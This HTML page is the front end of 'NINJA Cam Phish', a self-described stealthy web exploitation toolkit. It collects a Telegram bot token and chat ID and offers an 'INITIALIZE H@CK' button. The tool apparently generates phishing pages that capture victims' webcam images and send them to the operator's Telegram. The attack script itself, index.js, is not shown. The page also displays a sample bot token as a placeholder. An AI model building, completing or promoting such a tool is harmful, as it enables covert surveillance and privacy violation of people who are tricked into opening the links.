<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <link rel="shortcut icon" href="https://i.ibb.co/4Rdmyt7m/IMG-20250528-114954-Picsart-Ai-Image-Enhancer-removebg-preview.png" />
    <meta property="og:title" content="🕷️ Next-gen web-based exploitation toolkit — stronger, stealthier, and smarter than BeEF" />
    <meta property="og:description" content="🕷️ Next-gen web-based exploitation toolkit — stronger, stealthier, and smarter than BeEF" />
    <meta property="og:image" content="https://i.ibb.co/Sw361CLS/20250604-142556.jpg" />
    <meta name="robots" content="noindex, nofollow">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>NINJA Cam Phish- CYBER MATRIX</title>
</head>
<body>
   
    <canvas class="matrix-canvas"></canvas>
    
    
    <div class="glitch-overlay"></div>
    
    
    <div class="scan-lines"></div>
    
  
    <div class="main-wrapper">
      
        <div class="terminal-header">
            <div class="terminal-controls">
                <span class="control-btn close"></span>
                <span class="control-btn minimize"></span>
                <span class="control-btn maximize"></span>
            </div>
            <div class="terminal-title">root@cybermatrix:~# cam_generator.web</div>
        </div>
        
        <div class="logo">
            <div class="logo-container">
                <img src="https://i.ibb.co/4Rdmyt7m/IMG-20250528-114954-Picsart-Ai-Image-Enhancer-removebg-preview.png" alt="Cam Logo">
            </div>
        </div>
        
        <div class="container">
            <div class="hacker-title">
                <span class="glitch-text" data-text="NINJA CAM PHISH ">NINJA CAM PHISH </span>
                <div class="title-underline"></div>
            </div>
            
            <div class="terminal-prompt">
                <span class="prompt-symbol">[root@matrix]$</span> <span class="typing-text">Connection established • System ready</span>
            </div>
            
            <div class="input-section">
                <div class="input-group">
                    <label class="cyber-label">
                        <span class="label-icon">🔐</span>
                        <span class="label-text">TELEGRAM TOKEN</span>
                        <span class="blink-cursor">_</span>
                    </label>
                    <div class="input-container">
                        <input type="text" placeholder="Ex: 7156722537:AAEvtWVJetHpPAqeJ7guo-TF3GVxWFjxLKk" id="telegramToken" class="cyber-input">
                        <div class="input-glow"></div>
                    </div>
                </div>
                
                <div class="input-group">
                    <label class="cyber-label">
                        <span class="label-icon">🎯</span>
                        <span class="label-text">CHAT ID</span>
                        <span class="blink-cursor">_</span>
                    </label>
                    <div class="input-container">
                        <input type="text" placeholder="Ex: 5080596463" id="chatId" class="cyber-input">
                        <div class="input-glow"></div>
                    </div>
                </div>
            </div>
            
            <div class="button-container">
                <button id="loginButton" class="cyber-button">
                    <span class="button-text">INITIALIZE H@CK</span>
                    <div class="button-bg"></div>
                    <div class="button-particles"></div>
                </button>
            </div>
            
            <!-- Loading Animation -->
            <div class="loading-container" id="loadingContainer" style="display: none;">
                <div class="loading-text">
                    <span class="loading-dots">Establishing secure connection</span>
                </div>
                <div class="progress-bar">
                    <div class="progress-fill"></div>
                </div>
            </div>
        </div>
        <br>
        <div class="footer">
            <div class="footer-content">
                <span class="footer-text">
                    Developer <a href="https://sujon0xff.vercel.app/" target="_blank" class="cyber-link">Sujon Islam</a>
                    | Join <a href="https://t.me/Freedom369_4u" target="_blank" class="cyber-link">Telegram Channel</a>
                </span>
            </div>
        </div>
    </div>
 <script src="index.js"></script>
</body>
</html>